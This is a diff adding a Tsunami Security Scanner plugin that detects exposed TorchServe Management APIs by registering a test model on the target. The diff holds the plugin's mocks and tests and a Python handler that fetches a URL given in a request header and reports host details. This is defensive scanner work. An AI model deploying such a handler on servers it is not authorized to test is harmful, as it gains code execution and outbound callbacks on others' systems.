http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** A {@link PluginBootstrapModule} for {@link TorchServeManagementApiDetector}. */ +public final class TorchServeManagementApiDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(TorchServeManagementApiDetector.class); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java new file mode 100644 index 000000000..6e2412c58 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java @@ -0,0 +1,47 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import java.security.MessageDigest; +import java.util.UUID; + +public class TorchServeRandomUtils { + public String getRandomValue() { + return UUID.randomUUID().toString(); + } + + /** + * Compares the provided hash with the MD5 hash of the given value. + * + * @param hash The hash to compare against the expected MD5 hash. + * @param randomValue The value used for generating the expected MD5 hash. + * @return True if the provided hash matches the MD5 hash of the given value, false otherwise. + */ + public boolean validateHash(String hash, String randomValue) { + try { + MessageDigest md = MessageDigest.getInstance("MD5"); + md.update(randomValue.getBytes()); + byte[] digest = md.digest(); + StringBuilder sb = new StringBuilder(); + for (byte b : digest) { + sb.append(String.format("%02x", b)); + } + return sb.toString().equals(hash); + } catch (Exception e) { + throw new RuntimeException(e); + } + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json b/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json new file mode 100644 index 000000000..af9a33a7c --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json @@ -0,0 +1,12 @@ +{ + "runtime": "python", + "model": { + "modelName": "tsunami-torch-rce-validator", + "serializedFile": "serialized.pt", + "handler": "model.py", + "modelVersion": "1.0" + }, + "modelServerVersion": "1.0", + "implementationVersion": "1.0", + "specificationVersion": "1.0" +} diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py b/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py new file mode 100644 index 000000000..9e27f2323 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/resources/model/model.py @@ -0,0 +1,79 @@ +#!/usr/bin/env python + +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +This Python script is part of a vulnerability detection plugin for Google's Tsunami Security Scanner. +The plugin is designed to assess the Remote Code Execution (RCE) capability of systems by deploying +this script as a model in TorchServe. It handles specific HTTP request headers to simulate various +actions without creating additional attack surface. The script's behaviors include: + +- Calculating an MD5 hash for the 'tsunami-execute' header value to simulate command execution. +- Sending a GET request to a specified URL in the 'tsunami-callback' header to validate data exfiltration. +- Collecting basic system information in response to the 'tsunami-info' header for aiding vulnerability mitigation. +- Logging the value of the 'tsunami-log' header to the container's standard output. + +This script is a part of an automated testing process and does not perform any malicious activities. +In case of unexpected termination of the Tsunami plugin, this script may remain on the system. To verify +its origin and purpose, please refer to the following repositories: + +- Tsunami Security Scanner: https://github.com/google/tsunami-security-scanner +- Tsunami RCE Plugin for TorchServe: https://github.com/google/tsunami-security-scanner-plugins/tree/master/doyensec/detectors/rce/torchserve + +The plugin attempts to clean up by removing the model post-execution, with the primary output being a log entry. +""" + +import hashlib +import urllib.request +import platform +import json + +def produce_conformant_output(string, length): + """Produce a list of length `length` with `string` as the first element.""" + return [string] + ["Ok"] * (length - 1) + +def handle(data, context): + """Handle a request to the model. Echoes the input string, unless special headers are set.""" + if (context is None) or (data is None): + return None + + headers = context.get_all_request_header(0) + if headers is None: + return data + + response = data[0] + if "tsunami-execute" in headers: + # Simulate command execution by calculating an MD5 hash of the headers value + response = hashlib.md5(headers["tsunami-execute"].encode()).hexdigest() + elif "tsunami-callback" in headers: + # Validates data exfiltration by sending a GET request to the specified URL + try: + urllib.request.urlopen(headers["tsunami-callback"]) + except: + pass + elif "tsunami-info" in headers: + # Collects basic system info to simplify vulnerability mitigation + info = { + "platform": platform.platform(), + "python": platform.python_version(), + "hostname": platform.node() + } + response = json.dumps(info) + + elif "tsunami-log" in headers: + # Logs the value of the 'tsunami-log' header to the container's standard output + print(headers["tsunami-log"]) + + return produce_conformant_output(response, len(data)) diff --git a/doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt b/doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt new file mode 100644 index 000000000..e69de29bb diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java new file mode 100644 index 000000000..79adb92d2 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java @@ -0,0 +1,47 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.NetworkService; +import javax.inject.Inject; +import org.checkerframework.checker.nullness.qual.Nullable; + +/** + * A mock TorchServeExploiter that allows us to set the Details object returned by the + * isServiceVulnerable method. + */ +public class MockTorchServeExploiter extends TorchServeExploiter { + @Inject + public MockTorchServeExploiter( + TorchServeManagementApiConfig config, + TorchServeManagementApiArgs args, + HttpClient httpClient, + PayloadGenerator payloadGenerator, + TorchServeManagementAPIExploiterWebServer webServer, + TorchServeRandomUtils randomUtils) { + super(config, args, httpClient, payloadGenerator, webServer, randomUtils); + } + + public boolean returnNullDetails = false; + + // Override the method to return the mock details + @Override + public @Nullable Details isServiceVulnerable(NetworkService service) { + return returnNullDetails ? null : this.details; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java new file mode 100644 index 000000000..c2e3df78b --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java @@ -0,0 +1,52 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +public class MockTorchServeManagementApiExploiterWebServer + extends TorchServeManagementAPIExploiterWebServer { + private boolean started = false; + private boolean stopped = false; + private String startedHostname = null; + private int startedPort = -1; + + @Override + public void start(String hostname, int port) { + this.started = true; + this.startedHostname = hostname; + this.startedPort = port; + } + + @Override + public void stop() { + this.stopped = true; + } + + public boolean isStarted() { + return started; + } + + public boolean isStopped() { + return stopped; + } + + public String getStartedHostname() { + return startedHostname; + } + + public int getStartedPort() { + return startedPort; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java new file mode 100644 index 000000000..4e058b16e --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java @@ -0,0 +1,22 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +public class MockTorchServeRandomUtils extends TorchServeRandomUtils { + public boolean validateHash(String hash, String randomValue) { + return true; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java new file mode 100644 index 000000000..8214580ba --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java @@ -0,0 +1,195 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TransportProtocol; +import java.io.IOException; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import org.checkerframework.checker.nullness.qual.Nullable; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +@RunWith(JUnit4.class) +public final class TorchServeExploiterTest extends TorchServeManagementApiTestBase { + @Inject private TorchServeExploiter exploiter; + + NetworkService service; + + @Before + public void setUpNetworkService() { + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTorchServe.getHostName(), mockTorchServe.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("torchserve")) + .setServiceName("http") + .build(); + } + + private void enqueueMockTorchServeResponse(String response) { + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody(response)); + } + + private String API_DESCRIPTION_RESPONSE = + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for serving deep" + + " learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/models\": {\n" + + " \"post\": {\n" + + " \"description\": \"Register a new model in TorchServe.\",\n" + + " \"operationId\": \"registerModel\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}"; + + private String EMPTY_MODELS_RESPONSE = "{\"models\": []}"; + + private String getCustomizedMetadataResponse(@Nullable String metadata) { + return "[{ \"customizedMetadata\" : \"" + (metadata == null ? "" : metadata) + "\" }]"; + } + + @Test + public void isServiceVulnerable_ifServiceIsNotTorchServe_returnsNull() throws IOException { + // This is template of Inference API response not Management API (no POST /models) + enqueueMockTorchServeResponse( + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for serving" + + " deep learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/metrics\": {\n" + + " \"get\": {\n" + + " \"description\": \"Get TorchServe application metrics in prometheus" + + " format.\",\n" + + " \"operationId\": \"metrics\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}"); + assertThat(exploiter.isServiceVulnerable(service)).isNull(); + } + + @Test + public void isServiceVulnerable_ifServiceIsVulnerableBasic_returnsDetails() throws IOException { + enqueueMockTorchServeResponse(API_DESCRIPTION_RESPONSE); + // Generate the JSON response with the array of models: + // "models": [ + // { + // "modelName": "squeezenet1_1", + // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" + // }, + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\"models\": [\n" + + "{\n" + + " \"status\": \"SUCCESS\",\n" + + " \"modelName\": \"squeezenet1_1\",\n" + + " \"modelUrl\":" + + " \"https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar\"\n" + + "}]}")); + + TorchServeExploiter.Details details = exploiter.isServiceVulnerable(service); + + assertThat(details).isNotNull(); + assertThat(details.models).containsExactly("squeezenet1_1"); + assertThat(details.getSeverity()).isEqualTo(Severity.LOW); + assertThat(details.isVerified()).isFalse(); + assertThat(details.generateDescription()) + .isEqualTo( + "An exposed TorchServe management API was detected on the target. TorchServe is a model" + + " server for PyTorch models. The management API allows adding new models to the" + + " server which by design can be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could allow unauthorized" + + " users to run arbitrary code on the server."); + assertThat(details.generateAdditionalDetails()) + .isEqualTo( + "Callback verification is not enabled in Tsunami configuration, so the exploit could" + + " not be confirmed and only the Management API detection is reported. It is" + + " recommended to enable callback verification for more conclusive vulnerability" + + " assessment.\n" + + "Models found on the target:\n" + + " - squeezenet1_1"); + } + + @Test + public void isServiceVulnerable_successfulExploitInStaticMode() throws IOException { + // Setup the details for STATIC mode + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.STATIC; + exploiter.details.staticUrl = "http://mock-static-url.com/model.mar"; + + enqueueMockTorchServeResponse(API_DESCRIPTION_RESPONSE); + + // Mocking the response for listing models - assuming an empty list for simplicity + enqueueMockTorchServeResponse(EMPTY_MODELS_RESPONSE); + + // Mocking the response for removeModelByUrl + enqueueMockTorchServeResponse(EMPTY_MODELS_RESPONSE); + + // Mocking the response for model registration + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"status\": \"Model \\\"squeezenet1_1\\\" Version: 1.0 registered with 1" + + " initial workers\"\n" + + "}")); + + // Mocking the response for model list to confirm the model was registered + enqueueMockTorchServeResponse(""); + + // Mocking the response to hash verification request + enqueueMockTorchServeResponse(getCustomizedMetadataResponse(null)); + + // Mocking the response to adding a log file + enqueueMockTorchServeResponse(getCustomizedMetadataResponse(null)); + + // Mocking the response to system info request + enqueueMockTorchServeResponse(getCustomizedMetadataResponse("{}")); + + // Perform the exploitation test + TorchServeExploiter.Details details = exploiter.isServiceVulnerable(service); + + // Assertions + assertThat(details).isNotNull(); + assertThat(details.exploitationMode).isEqualTo(TorchServeExploiter.ExploitationMode.STATIC); + assertThat(details.exploitUrl).isEqualTo(exploiter.details.staticUrl); + assertThat(details.isVerified()).isTrue(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java new file mode 100644 index 000000000..a9d185c42 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java @@ -0,0 +1,108 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Software; +import com.google.tsunami.proto.TransportProtocol; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +@RunWith(JUnit4.class) +public class TorchServeExploiterTestWithCallback + extends TorchServeManagementApiTestBaseWithCallbackServer { + @Inject private TorchServeExploiter exploiter; + NetworkService service; + + public void onTestExecution() { + setUpNetworkService(); + setUpMockServices(); + } + + private void setUpNetworkService() { + service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTorchServe.getHostName(), mockTorchServe.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("torchserve")) + .setServiceName("http") + .build(); + } + + public void setUpMockServices() { + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"openapi\": \"3.0.1\",\n" + + " \"info\": {\n" + + " \"title\": \"TorchServe APIs\",\n" + + " \"description\": \"TorchServe is a flexible and easy to use tool for" + + " serving deep learning models\",\n" + + " \"version\": \"0.8.1\"\n" + + " },\n" + + " \"paths\": {\n" + + " \"/models\": {\n" + + " \"post\": {\n" + + " \"description\": \"Register a new model in TorchServe.\",\n" + + " \"operationId\": \"registerModel\"\n" + + " }\n" + + " }\n" + + " }\n" + + "}")); + + // Mocking the response for listing models - assuming an empty list for simplicity + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody("{\"models\": []}")); + + // Mocking the response for removeModelByUrl + mockTorchServe.enqueue(new MockResponse().setResponseCode(200).setBody("{\"models\": []}")); + + // Mocking the response for model registration + mockTorchServe.enqueue( + new MockResponse() + .setResponseCode(200) + .setBody( + "{\n" + + " \"status\": \"Model \\\"squeezenet1_1\\\" Version: 1.0 registered with 1" + + " initial workers\"\n" + + "}")); + } + + @Test + public void details_isServiceVulnerableReturnsNullIfCallbackNotTriggered() throws Exception { + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + assertThat(exploiter.isServiceVulnerable(service)).isNull(); + } + + @Test + public void detect_isServiceVulnerable_returnsDetailsIfCallbackTriggered() throws Exception { + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + assertThat(exploiter.isServiceVulnerable(service)).isNotNull(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java new file mode 100644 index 000000000..6736a75f9 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java @@ -0,0 +1,416 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.truth.Truth.assertThat; + +import com.google.common.collect.ImmutableList; +import com.google.inject.AbstractModule; +import com.google.inject.Module; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.proto.AdditionalDetail; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TextData; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.util.List; +import javax.inject.Inject; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** + * Unit tests for {@link TorchServeManagementApiDetector}. Tested in isolation from the {@link + * TorchServeExploiter}. + */ +@RunWith(JUnit4.class) +public final class TorchServeManagementApiDetectorTest extends TorchServeManagementApiTestBase { + @Inject private MockTorchServeExploiter exploiter; + + private TorchServeManagementApiDetector detector; + + @Override + protected void onTestExecution() { + detector = new TorchServeManagementApiDetector(exploiter, fakeUtcClock); + } + + @Override + protected Module getBaseModule() { + Module basemoModule = super.getBaseModule(); + Module mockTorchServeExploiterModule = + new AbstractModule() { + @Override + protected void configure() { + bind(MockTorchServeExploiter.class); + } + }; + return Modules.override(basemoModule).with(mockTorchServeExploiterModule); + } + + @Test + public void detect_whenTorchServeIsNotVulnerable_doesNotReportVulnerability() throws IOException { + exploiter.returnNullDetails = true; + assertThat(getDetectionReports()).isEmpty(); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithBasicMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.BASIC; + exploiter.details.models = ImmutableList.of(); + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.LOW) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the server.") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Callback verification is not enabled in Tsunami" + + " configuration, so the exploit could not be" + + " confirmed and only the Management API detection" + + " is reported. It is recommended to enable" + + " callback verification for more conclusive" + + " vulnerability assessment.") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithSsrfMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.SSRF; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by receiving a callback from" + + " the target while adding a new model with the following details:" + + " - Name: test_model - URL: http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "A callback was received from the target while adding a" + + " new model, confirming the exploit. Code" + + " execution was not verified directly. For a more" + + " direct confirmation of remote code execution," + + " consider using STATIC or LOCAL modes.") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithStaticMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.STATIC; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + exploiter.details.systemInfo = "{\"os\": \"Linux\"}"; + exploiter.details.messageLogged = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: "; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by adding a new model to the" + + " target with the following details: 